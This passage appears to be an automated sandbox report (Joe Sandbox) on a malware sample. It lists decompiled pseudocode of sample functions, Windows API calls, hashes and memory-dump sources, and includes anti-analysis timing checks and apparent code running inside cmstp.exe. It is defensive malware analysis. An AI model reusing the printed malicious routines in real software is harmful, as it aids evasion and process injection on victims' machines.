					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0E0( &_v284, 0x104);
						E0041A750( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088cb
0x004088d3
0x004088d5
0x004088da
0x004088df
0x004088f2
0x004088f7
0x00408900
0x0040890c
0x0040891f
0x00408924
0x00408927
0x00408930
0x00408942
0x00408947
0x0040894c
0x00000000
0x00000000
0x0040894e
0x00408952
0x00000000
0x00000000
0x00408954
0x00000000
0x00408952
0x00408956
0x00408959
0x0040895f
0x00408961
0x0040896c
0x00408971
0x00408974
0x00408981
0x0040898c
0x0040898e
0x00408994
0x00408998
0x0040899b
0x0040899b
0x004089a2
0x004089a5
0x004089aa
0x004089b7
0x004088e6
0x004088e6
0x004088e6

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004188A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188b7
0x004188c2
0x004188cd
0x004188d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD

Strings

&5A, xrefs: 004188C2, 004188CC

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407280 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407280
0x0040728f
0x00407293
0x0040729e
0x004072ae
0x004072be
0x004072c3
0x004072ca
0x004072cd
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x00000000
0x004072fd
0x00407302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA

Uniqueness

Uniqueness Score: -1.00%

Function 004188E0 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A40 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a5a
0x00418a70
0x00418a74

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418A3D Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00418A3D(void* __eax, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t11;
				void* _t16;

				_t8 = _v0;
				E004191D0(_t16, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x46);
				_t11 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t11;
			}

0x00418a43
0x00418a5a
0x00418a70
0x00418a74

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 68e24f18a98c0934992900a04fd7b1caaaf970ad6eec730655bd870a6a8e6289
Instruction ID: b670b09581dccfebe9c2721492610bb4e2188dc931a28522af16bcb5cee9b408
Opcode Fuzzy Hash: 68e24f18a98c0934992900a04fd7b1caaaf970ad6eec730655bd870a6a8e6289
Instruction Fuzzy Hash: C3E01AB52002146BDB14DF55CC88EEB37A9AF88250F118559F90DAB241CA34E8548BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00418920 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				asm("in al, dx");
				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418922
0x00418923
0x0041893a
0x00418948

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00418922 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00418922() {
				void* _t10;
				void* _t13;

				asm("in al, dx");
				_t5 =  *((intOrPtr*)(_t13 + 8));
				E004191D0(_t10,  *((intOrPtr*)(_t13 + 8)),  *((intOrPtr*)(_t13 + 8)) + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess( *(_t13 + 0xc));
			}

0x00418922
0x00418923
0x0041893a
0x00418948

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: f70bcf56cb69372f97621f00c904547e8f0c00941ce3998ab6fd1aa7f2f5f90f
Instruction ID: bcc4e7b2fc799383d7744487e22c35964dff55b9f46ce5d7aaa56c7045d31e3e
Opcode Fuzzy Hash: f70bcf56cb69372f97621f00c904547e8f0c00941ce3998ab6fd1aa7f2f5f90f
Instruction Fuzzy Hash: B4D05E716002047BD624DF68CC89FD73BA89F58390F058168B91CAB241C531AA00CAA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040C3D8 Relevance: 2.5, Strings: 2, Instructions: 26COMMON

Download Yara Rule

Strings

(,/1, xrefs: 0040C3DE
rDz, xrefs: 0040C3D9

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID:
String ID: (,/1$rDz
API String ID: 0-3058485086
Opcode ID: d1a2dacd7e16d65ea047bb829ec2ea915e9855e41fa1299a545afaa17ab7236a
Instruction ID: be8fd1a886aba471fb9c8b8c1a47acffcf2603595e109334f7766d00e483898b
Opcode Fuzzy Hash: d1a2dacd7e16d65ea047bb829ec2ea915e9855e41fa1299a545afaa17ab7236a
Instruction Fuzzy Hash: 65E0C232E4451A9EC6208E8AEC421B0F720F70A672F441796EE0873F61A122847382ED

Uniqueness

Uniqueness Score: -1.00%

Function 00415652 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00415652(void* __eax) {

				asm("adc al, 0x75");
				return __eax;
			}

0x0041567a
0x00415686

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49fed755682ada16b0acf9c5afc926eb963d8b6596879441eb104c1e809cbf71
Instruction ID: 5c6a62ab4bc7ceebb87388fb71f4a8924917daec533ca27df148c51be80d2b07
Opcode Fuzzy Hash: 49fed755682ada16b0acf9c5afc926eb963d8b6596879441eb104c1e809cbf71
Instruction Fuzzy Hash: B0A01223E4A0041094100C483C401F5E374D2C7035D603393DC0C734001082C41300CD

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmstp.exePID: 612, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	1.9%
Signature Coverage:	0%
Total number of Nodes:	736
Total number of Limit Nodes:	88

Executed Functions

Function 00DC85D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00DC3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DC3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00DC861D

Strings

.z`, xrefs: 00DC860D, 00DC8618

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 78a763a6347137fccc32dc1e72e36dac3d44ead3d2cc31056a21ffcc4b474d0c
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: F8F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8680 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00DC3D62,5E972F65,FFFFFFFF,00DC3A21,?,?,00DC3D62,?,00DC3A21,FFFFFFFF,5E972F65,00DC3D62,?,00000000), ref: 00DC86C5

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: d7ea4b9cc901240c4ab231897c31da82f3684f2d4d2495c31fa07bdc56400d47
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 22F0A4B2200209AFCB18DF89DC95EEB77ADEF8C754F158248BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC87AA Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00DB2D11,00002000,00003000,00000004), ref: 00DC87E9

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 9aa7854349530ebd9fc1ba3e87b7425c55f76dce4adde405206e6cddacd99c27
Instruction ID: faa63008a46424628f2f676d4784dbab30a94bb3666788a09402cb7770e5d993
Opcode Fuzzy Hash: 9aa7854349530ebd9fc1ba3e87b7425c55f76dce4adde405206e6cddacd99c27
Instruction Fuzzy Hash: D7F05E72200119AFCB14DF98CC91EAB77ADEF88350F148219FD189B291C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC87B0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00DB2D11,00002000,00003000,00000004), ref: 00DC87E9

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: d95b8a8506f9b10bd063aff7fe13de1ca83848cef04a23ddeb9d6df8742ce1af
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 23F015B2200209AFCB18DF89CC85EAB77ADEF88750F158148BE0897241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC86FA Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00DC3D40,?,?,00DC3D40,00000000,FFFFFFFF), ref: 00DC8725

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 352f7ba1dfda7c10570464f296529650686084a9b521a3478e3d9887e9e5d598
Instruction ID: 87fb533628178d2ab995c387ecf115c72b1e577f1457ebda3434ad7447b85e51
Opcode Fuzzy Hash: 352f7ba1dfda7c10570464f296529650686084a9b521a3478e3d9887e9e5d598
Instruction Fuzzy Hash: CBE0C27A600204BBD710EB94CC4AFD77B68EF44720F144458BA1C9B342C570EA01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8700 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00DC3D40,?,?,00DC3D40,00000000,FFFFFFFF), ref: 00DC8725

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 2da8c7a3a5aecb083f297e699d8a89cc37e91580d0bc85095b565222f036b17d
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 66D01276600314ABD714EB98CC49F97775CEF44750F154459BA185B242C570F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 05119540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0511954A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 277c24a3ae76205babb39866eadc79d176fc80445e25a2e12855662ff1d29a37
Instruction ID: bbcd566270ae5a36165f943b3c102fc93d555112d733ac7808b5a46bbf4404f5
Opcode Fuzzy Hash: 277c24a3ae76205babb39866eadc79d176fc80445e25a2e12855662ff1d29a37
Instruction Fuzzy Hash: 67900265211010030105A5595744507005697D53A13A1C425F5046550CD76588726161

Uniqueness

Uniqueness Score: -1.00%

Function 051195D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051195DA

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9cfd50445cc1073e38d8b6d516dc1b2669f5b0286eaabe0ca66be6f5a82c2469
Instruction ID: 88911117d436cd714a8dba63b2ae5db51d07a616a5de9ac856458c58fcc2391e
Opcode Fuzzy Hash: 9cfd50445cc1073e38d8b6d516dc1b2669f5b0286eaabe0ca66be6f5a82c2469
Instruction Fuzzy Hash: B69002A120201003410571599554616401A97E0251BA1C425E5045590DC66988B27165

Uniqueness

Uniqueness Score: -1.00%

Function 05119710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0511971A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3eb384e863f16387029ecdb867ecc343fb5971e6f7e008170efac8e4ad58fbd4
Instruction ID: 456350cfcea2644d3aff07b839d5a7a3c35853db94c3dabbd15990f31588957d
Opcode Fuzzy Hash: 3eb384e863f16387029ecdb867ecc343fb5971e6f7e008170efac8e4ad58fbd4
Instruction Fuzzy Hash: CF90027120101402D1006599A548646001597E0351FA1D415A9055555EC7A988B27171

Uniqueness

Uniqueness Score: -1.00%

Function 05119780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0511978A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de6b6f33cd65e15423367fbc5f16157799d07df4de923553bc8e8fff6512d824
Instruction ID: 126b3a0bef6331005b20e9c1f6601145f1c5145856bc6bd4a8fd2960304496bc
Opcode Fuzzy Hash: de6b6f33cd65e15423367fbc5f16157799d07df4de923553bc8e8fff6512d824
Instruction Fuzzy Hash: B690026921301002D1807159A54860A001597D1252FE1D819A4046558CCA59887A6361

Uniqueness

Uniqueness Score: -1.00%

Function 05119FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05119FEA

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6f0f07a2dc3abd482b861b9ddcee352f925f905204003cadf6fc82443a7da2e
Instruction ID: d996a2f8ac9936d924da2ee93eb3079b32f6c1ec7c82361af0d9782efb43a725
Opcode Fuzzy Hash: a6f0f07a2dc3abd482b861b9ddcee352f925f905204003cadf6fc82443a7da2e
Instruction Fuzzy Hash: 3C90027131115402D1106159D544706001597D1251FA1C815A4855558D87D988B27162

Uniqueness

Uniqueness Score: -1.00%

Function 05119650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0511965A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ddc487f88dc203ffd320fc9a4974ebe4412e22414230054de61fe82530e5f0d
Instruction ID: cb0d173bcbc4084651cd639eec60f89c533f903272c787ebae46011b393e57bf
Opcode Fuzzy Hash: 3ddc487f88dc203ffd320fc9a4974ebe4412e22414230054de61fe82530e5f0d
Instruction Fuzzy Hash: E690027120505842D14071599544A46002597D0355FA1C415A4095694D97698D76B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 05119660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0511966A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb503d4eecd981301e3ec677a4c314a8a72bc8b052d55960edac99bd32be9ca8
Instruction ID: 7e5237235e28ff490010bbf039c42fc8ca85c9ad7b3dddb19315fe3474672ef1
Opcode Fuzzy Hash: eb503d4eecd981301e3ec677a4c314a8a72bc8b052d55960edac99bd32be9ca8
Instruction Fuzzy Hash: C190027120101802D1807159954464A001597D1351FE1C419A4056654DCB598A7A77E1

Uniqueness

Uniqueness Score: -1.00%

Function 051196D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

